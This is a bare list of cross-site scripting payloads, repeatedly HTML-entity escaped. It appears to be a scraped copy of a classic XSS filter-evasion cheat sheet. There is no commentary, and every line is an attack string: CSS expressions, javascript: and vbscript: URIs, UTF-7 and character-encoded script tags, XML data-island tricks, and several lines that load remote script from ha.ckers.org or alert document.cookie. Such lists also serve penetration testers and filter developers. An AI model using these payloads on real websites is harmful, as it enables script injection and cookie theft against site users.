&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML&amp;amp;gt;&amp;amp;lt;BODY&amp;amp;gt;&amp;amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/BODY&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;amp;lt;SCR'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;? echo('&amp;amp;lt;SCR)';echo('IPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;');&amp;amp;nbsp;?&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;amp;gt; &amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=`&amp;amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT&amp;amp;gt;document.write(&amp;quot;&amp;quot;&amp;amp;lt;SCRI&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;about:&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/style&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
